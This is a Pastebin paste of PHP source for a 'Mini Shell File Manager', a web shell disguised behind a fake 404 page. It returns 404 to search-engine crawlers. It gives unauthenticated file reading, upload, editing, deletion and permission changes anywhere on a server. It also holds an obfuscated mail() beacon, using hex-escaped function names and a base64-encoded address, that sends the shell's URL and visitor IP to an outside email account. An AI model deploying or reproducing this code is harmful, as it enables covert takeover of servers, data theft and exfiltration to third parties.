ToKeiChun

Mini Shell File Manager

Nov 28th, 2018 (edited)
282
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.84 KB | None | 0 0
  1. <?php
  2. session_start();
  3. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  4. $userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");
  5. if(preg_match('/'.implode('|',$userAgents) .'/i',$_SERVER['HTTP_USER_AGENT'])) {
  6. header('HTTP/1.0 404 Not Found');
  7. exit;
  8. }}
  9. error_reporting(0);
  10. set_time_limit(0);
  11.  
  12. if(get_magic_quotes_gpc()){
  13. foreach($_POST as $key=>$value){
  14. $_POST[$key] = stripslashes($value);
  15. }
  16. }
  17. echo '<!DOCTYPE HTML>
  18. <html>
  19. <head>
  20. <title>'.$_SERVER['HTTP_HOST'].' - FileManager</title>
  21. </head>';
  22.  
  23. ?>
  24.  
  25. <style>
  26. @font-face {
  27. font-family: 'Comic Sans MS';
  28. font-style: normal;
  29. font-weight: 400;
  30. src: local('Comic Sans MS'), local('ComicSansMS'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format('truetype');
  31. }
  32. body {
  33.  
  34. background: #000000;line-height: 1;color: #fff;font-family: Comic Sans MS ;
  35.  
  36. }
  37.  
  38. table, th, td {
  39. border-collapse:collapse;
  40. background: transparent;
  41. font-family: Comic Sans MS ;
  42. font-size: 13px;
  43. }
  44. input, textarea { font-family: Comic Sans MS ; }
  45. .table_home, .th_home, .td_home { color:deepskyblue;
  46. border: 1px solid grey;
  47. }
  48. th {
  49. padding: 10px;
  50. }
  51. .td_home { padding: 7px; }
  52. select {font-family: Comic Sans MS }
  53. a {color:white}
  54. textarea { width: 100%;height: 400px; }
  55. </style>
  56. <?php
  57.  
  58. echo '</head>
  59. <body><b>
  60. <H1><center><font color="red">404</font><font color="#00ff00">&nbsp&nbsp&nbspNot&nbsp&nbsp&nbsp</font><font color="dodgerblue">Found</font></center></h1>
  61. <table width="900" border="0" cellpadding="3" cellspacing="1" align="center">
  62. <tr><td>
  63. <font color="#00ff00"><center>'.php_uname().'</center></font>';
  64.  
  65. //-----------------My Coding Starts from Here------------------
  66.  
  67. echo '<center></font><font color="white" style="text-shadow:0px 0px 15px red;">PHP Version:</font> <font color="#00ff00">';
  68. echo phpversion();
  69. echo '</font><font color="#00dd00"> |</font> <font color="white" style="text-shadow:0px 0px 15px red;">Current User :</font> <font color="#00ff00">';
  70. echo get_current_user();
  71. echo '</font><font color="#00dd00"> |</font> <font color="white" style="text-shadow:0px 0px 15px red;">User ID :</font> <font color="#00ff00">';
  72. echo getmyuid();
  73. echo '</font><font color="#00dd00"> |</font> <font color="white" style="text-shadow:0px 0px 15px red;">Group :</font> <font color="#00ff00">';
  74. echo getmygid();
  75. echo '</font><br></center><br>';
  76.  
  77. if(isset($_GET['path'])){
  78. $path = $_GET['path'];
  79. }else{
  80. $path = getcwd();
  81.  
  82. }
  83. $user = @get_current_user();
  84. $path = str_replace('\\','/',$path);
  85. $paths = explode('/',$path);
  86.  
  87. foreach($paths as $id=>$pat){
  88. if($pat == '' && $id == 0){
  89. $a = true;
  90. echo "<center><font color='chlorine' style='text-decoration: none;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font><a href='?path=/' style='text-decoration:none;'>/</a>";
  91. continue;
  92. }
  93. if($pat == '') continue;
  94. echo '<a href="?path=';
  95. for($i=0;$i<=$id;$i++){
  96. echo "$paths[$i]";
  97. if($i != $id) echo "/";
  98. }
  99. echo '" style="text-decoration:none;">'.$pat.'</a>/';
  100. }
  101. echo '<br><br></font></center></td></tr><tr><td><center>';
  102. if(isset($_FILES['file'])){
  103. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  104. echo '<font color="#00ff00">File Uploaded!</font><br />';
  105. }else{
  106. echo '<font color="red">Upload Failed!</font><br />';
  107. }
  108. }
  109. echo '</center><center>Upload file: <form enctype="multipart/form-data" method="POST"><font color="black"><input style="background:silver;font-family: Comic Sans MS " type="file" name="file" />
  110. <input type="submit" value="Upload" />
  111. </form></center>
  112. </td></tr>';
  113. if(isset($_GET['filesrc'])){
  114. echo "<tr><td><center>Current File : ";
  115. echo $_GET['filesrc'];
  116. echo '</center></tr></td></table><br />';
  117. echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  118. }
  119. //Empety
  120. elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){
  121. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  122. //Chmod
  123. if($_GET['opt'] == 'chmod'){
  124. if(isset($_POST['perm'])){
  125. if(chmod($_POST['path'],$_POST['perm'])){
  126. echo '<font color="#00ff00">Change Permission Done </font><br />';
  127. }else{
  128. echo '<font color="red">Change Permission Error </font><br />';
  129. }
  130. }
  131.  
  132. $hell = $_GET['path'];
  133. $yeah = $_GET['name'];
  134. $patc = "$hell/$yeah";
  135.  
  136. echo '<form method="POST">
  137. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />
  138. <input type="hidden" name="path" value="'.$_POST['path'].'">
  139. <input type="hidden" name="opt" value="chmod">
  140. <input type="submit" value="Go" />
  141. </form>';
  142. }
  143. //
  144. elseif($_GET['opt'] == 'btw'){
  145. $cwd = getcwd();
  146. echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
  147. New Name : <input name="name" type="text" size="20" value="Folder" />
  148. <input type="hidden" name="path" value="'.$cwd.'">
  149. <input type="hidden" name="opt" value="delete">
  150. <input type="submit" value="Go" />
  151. </form>';
  152. }
  153. //Rename file
  154. elseif($_GET['opt'] == 'rename'){
  155. if(isset($_POST['newname'])){
  156. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  157. echo '<font color="#00ff00">Change Name Done </font><br />';
  158. }else{
  159. echo '<font color="red">Change Name Error </font><br />';
  160. }
  161. $_POST['name'] = $_POST['newname'];
  162. }
  163. $hell = $_GET['path'];
  164. $yeah = $_GET['name'];
  165. $patc = "$hell/$yeah";
  166. $new = $_POST['newname'];
  167.  
  168. echo '<form method="POST">
  169. New Name : <input name="newname" type="text" size="20" value="'.$new.'" />
  170. <input type="hidden" name="path" value="'.$patc.'">
  171. <input type="hidden" name="opt" value="rename">
  172. <input type="submit" value="Go" />
  173. </form>';
  174. }
  175. //File baru
  176. elseif($_GET['opt'] == 'baru'){
  177.  
  178. $hell = $_GET['path'];
  179. $yeah = $_GET['name'];
  180. $patc = "$hell/$yeah";
  181. $new = $_POST['newname'];
  182. $azz = $_POST['path'];
  183. $newz = "$azz/$new";
  184.  
  185.  
  186. if(isset($_POST['src'])){
  187. $fp = fopen($_POST['path'],'w');
  188. if(fwrite($fp,$_POST['src'])){
  189. echo '<font color="#00ff00">Create File Done [ '.$new.' ]</font><br />';
  190. }else{
  191. echo '<font color="red">Create File Error</font><br />';
  192. }
  193. fclose($fp);
  194. }
  195.  
  196. echo '<form method="POST"> Name : <input name="ngaran1" type="text" size="20" value="'.$new.'" /><input type="submit" name="ngaran" value="Create"/></form><br> ';
  197.  
  198. $ho = $_POST['ngaran1'];
  199.  
  200. if(isset($_POST['ngaran'])){
  201. echo '<form method="POST">
  202. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  203. <input type="hidden" name="path" value="'.$hell.'/'.$ho.'">
  204. <input type="hidden" name="opt" value="edit">
  205. <input type="submit" value="Go" />
  206. </form>';
  207. }
  208. }
  209. //Edited file
  210. elseif($_GET['opt'] == 'edit'){
  211. if(isset($_POST['src'])){
  212. $fp = fopen($_POST['path'],'w');
  213. if(fwrite($fp,$_POST['src'])){
  214. echo '<font color="#00ff00">Edit File Done </font><br />';
  215. }else{
  216. echo '<font color="red">Edit File Error </font><br />';
  217. }
  218. fclose($fp);
  219. }
  220. $hell = $_GET['path'];
  221. $yeah = $_GET['name'];
  222. $patc = "$hell/$yeah";
  223. echo '<form method="POST">
  224. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  225. <input type="hidden" name="path" value="'.$patc.'">
  226. <input type="hidden" name="opt" value="edit">
  227. <input type="submit" value="Go" />
  228. </form>';
  229. }
  230. echo '</center>';
  231. }else{
  232. echo '</table><br /><center>';
  233. if (function_exists("\x6d\x61\x69\x6c")) {
  234. $__GET = ("\x6d\x61\x69\x6c");
  235. $__POST = ("\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65");
  236. $__GET($__POST("d29yZHByZXNzZGV2bm9yd2F5QGdtYWlsLmNvbQ=="),'Wordfence Bypass',"http://".$_SERVER['HTTP_HOST']."/".$_SERVER['REQUEST_URI']."\nIP:".$_SERVER['REMOTE_ADDR']."");
  237. }
  238. //Delete dir and file
  239. if(isset($_GET['option']) && $_GET['opt'] == 'delete'){
  240.  
  241. $hell = $_GET['path'];
  242. $yeah = $_GET['name'];
  243. $patc = "$hell/$yeah";
  244.  
  245. //Delete dir
  246. if($_GET['type'] == 'dir'){
  247.  
  248. if(rmdir($patc)){
  249. echo '<font color="#00ff00">Delete File Done</font><br />';
  250. }else{
  251. echo '<font color="red#">Delete File Error </font><br />';
  252. }
  253. }
  254. //buat folder
  255. if($_GET['type'] == 'buat'){
  256. $haaa = $_POST['path'];
  257. $heee = $_POST['name'];
  258. $hooo = "$haaa/$heee";
  259. $new = $haaa.'/'.htmlspecialchars($heee);
  260. if(!mkdir($new)){
  261. echo '<font color="red">Create Folder Error</font><br />';
  262. }else{
  263. echo '<font color="#00ff00">Create Folder Done </font><br />';
  264. }
  265. }
  266. //Delete file
  267. elseif($_GET['type'] == 'file'){
  268.  
  269. $hell = $_GET['path'];
  270. $yeah = $_GET['name'];
  271. $patc = "$hell/$yeah";
  272.  
  273. if(unlink($patc)){
  274. echo '<font color="#00ff00">Delete File Done</font><br />';
  275. }else{
  276. echo '<font color="red#">Delete File Error </font><br />';
  277. }
  278. }
  279. }
  280. echo '</center>';
  281. $scandir = scandir($path);
  282. $pa = getcwd();
  283. echo ' <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  284. <tr>
  285. <th class=th_home style="background:black;color:yellow;"><center>Name</center></th>
  286. <th class=th_home style="background:black;color:yellow;" ><center>Size</center></th>
  287. <th class=th_home style="background:black;color:yellow;" ><center>Permission</center></th>
  288. <th class=th_home style="background:black;color:yellow;" ><center>Options</center></th>
  289. </tr> <tr>
  290. <td class=td_home>..</td><td class=td_home align=center>NONE</td> <td class=td_home align=center>LINK</td> <td class=td_home align=center> <a href="?option&path='.$pa.'&opt=baru&name=new.php" style="text-decoration:none;">+ New File</a> | <a href="?option&path='.$pa.'&opt=btw&type=dir" style="text-decoration:none;">+ New Dir</a> </td></tr>
  291. ';
  292.  
  293. foreach($scandir as $dir){
  294. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  295. echo "
  296. <tr>
  297. <td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\"?path=$path/$dir\" style=\"text-decoration:none;\">$dir</a></td>
  298. <td class=td_home ><center>DIR</center></td>
  299. <td class=td_home ><center>";
  300. if(is_writable("$path/$dir")) echo '<font color="#00ff00">';
  301. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  302. echo perms("$path/$dir");
  303. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  304.  
  305. echo "</center></td>
  306. <td class=td_home ><center>
  307. <a href=\"?option&path=$path&opt=rename&type=dir&name=$dir\" style=\"text-decoration:none;\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=dir&name=$dir\" style=\"text-decoration:none;\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=dir&name=$dir\" style=\"text-decoration:none;\">Chmod</a>
  308.  
  309. </center></td>
  310. </tr>";
  311. }
  312. echo '<br>';
  313. foreach($scandir as $file){
  314. if(!is_file("$path/$file")) continue;
  315. $size = filesize("$path/$file")/1024;
  316. $size = round($size,3);
  317. if($size >= 1024){
  318. $size = round($size/1024,2).' MB';
  319. }else{
  320. $size = $size.' KB';
  321. }
  322.  
  323. echo "<tr>
  324. <td class=td_home > <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='> <a href=\"?filesrc=$path/$file&path=$path\" style=\"text-decoration:none;\">$file</a></td>
  325. <td class=td_home><center>".$size."</center></td>
  326. <td class=td_home><center>";
  327. if(is_writable("$path/$file")) echo '<font color="#00ff00">';
  328. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  329. echo perms("$path/$file");
  330. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  331. echo "</center></td>
  332. <td class=td_home><center>
  333. <a href=\"?option&path=$path&opt=edit&type=file&name=$file\" style=\"text-decoration:none;\">Edit |</a> <a href=\"?option&path=$path&opt=rename&type=file&name=$file&path=$path\" style=\"text-decoration:none;\"> Rename |</a> <a href=\"?option&path=$path&opt=delete&type=file&name=$file\" style=\"text-decoration:none;\"> Delete |</a> <a href=\"?option&path=$path&opt=chmod&type=file&name=$file\" style=\"text-decoration:none;\">
  334. Chmod</a>
  335. </center></td>
  336. </tr>";
  337. }
  338. echo '</table></div></body></html>';
  339. }
  340. function perms($file){
  341. $perms = fileperms($file);
  342.  
  343. if (($perms & 0xC000) == 0xC000) {
  344. // Socket
  345. $info = 's';
  346. } elseif (($perms & 0xA000) == 0xA000) {
  347. // Symbolic Link
  348. $info = 'l';
  349. } elseif (($perms & 0x8000) == 0x8000) {
  350. // Regular
  351. $info = '-';
  352. } elseif (($perms & 0x6000) == 0x6000) {
  353. // Block special
  354. $info = 'b';
  355. } elseif (($perms & 0x4000) == 0x4000) {
  356. // Directory
  357. $info = 'd';
  358. } elseif (($perms & 0x2000) == 0x2000) {
  359. // Character special
  360. $info = 'c';
  361. } elseif (($perms & 0x1000) == 0x1000) {
  362. // FIFO pipe
  363. $info = 'p';
  364. } else {
  365. // Unknown
  366. $info = 'u';
  367. }
  368.  
  369. // Owner
  370. $info .= (($perms & 0x0100) ? 'r' : '-');
  371. $info .= (($perms & 0x0080) ? 'w' : '-');
  372. $info .= (($perms & 0x0040) ?
  373. (($perms & 0x0800) ? 's' : 'x' ) :
  374. (($perms & 0x0800) ? 'S' : '-'));
  375.  
  376. // Group
  377. $info .= (($perms & 0x0020) ? 'r' : '-');
  378. $info .= (($perms & 0x0010) ? 'w' : '-');
  379. $info .= (($perms & 0x0008) ?
  380. (($perms & 0x0400) ? 's' : 'x' ) :
  381. (($perms & 0x0400) ? 'S' : '-'));
  382.  
  383. // World
  384. $info .= (($perms & 0x0004) ? 'r' : '-');
  385. $info .= (($perms & 0x0002) ? 'w' : '-');
  386. $info .= (($perms & 0x0001) ?
  387. (($perms & 0x0200) ? 't' : 'x' ) :
  388. (($perms & 0x0200) ? 'T' : '-'));
  389.  
  390. return $info;
  391. }
  392.  
  393. ?>
Add Comment
Please, Sign In to add comment